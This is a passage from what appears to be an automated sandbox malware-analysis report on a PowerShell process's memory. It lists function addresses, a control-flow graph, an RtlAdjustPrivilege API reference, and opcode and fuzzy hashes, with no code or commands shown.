                        • Opcode Fuzzy Hash: 3a66caa4baf822c01b898d50a4ab67a22592a02f0bcff3038cdb9ca78cb6b66a
                        • Instruction Fuzzy Hash: AC31E93191CB488FDB18DF58DC46AE9BBE0FB99325F04426FE049D3252CA746446CB92
                        Function 00007FFD34575A42 Relevance: 1.7, APIs: 1, Instructions: 161COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 7ffd34575a42-7ffd34575b5a RtlAdjustPrivilege 3 7ffd34575b62-7ffd34575b8f 0->3 4 7ffd34575b5c 0->4 4->3
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2273018567.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_7ffd34570000_powershell.jbxd
                        Similarity
                        • API ID: AdjustPrivilege
                        • String ID:
                        • API String ID: 3260937286-0
                        • Opcode ID: 54eb9b25c9bca131cf9b26a64a5eccc4bfd3da1948cca4567f5b9db0830808e9
                        • Instruction ID: 5c28e8eb50cd964a2269891336f95d8c5ff7172880845ec1a461799215eb15a3
                        • Opcode Fuzzy Hash: 54eb9b25c9bca131cf9b26a64a5eccc4bfd3da1948cca4567f5b9db0830808e9
                        • Instruction Fuzzy Hash: B851233040E7C44FC70B8BA898556E97FF1EF57220F0942AFD089C70A3C669584AC752

                        Non-executed Functions

                        Function 00007FFD345716C9 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                        Download Yara Rule

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2273018567.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_7ffd34570000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,L_^$-L_^
                        • API String ID: 0-2978936201
                        • Opcode ID: d15f09e6f926ec13aea49ea9a31173ce2c869a72b84de58f7272be54ff2cc921
                        • Instruction ID: dd0ad7067ad2bbefb515a21898b06f67f8522adfecc1d2d578d14156be08bd3a
                        • Opcode Fuzzy Hash: d15f09e6f926ec13aea49ea9a31173ce2c869a72b84de58f7272be54ff2cc921
                        • Instruction Fuzzy Hash: 89515457E0D6D61AEB6357381CF50DA3FD4DF23268B0991F3C694CE1A3AD0C684BA252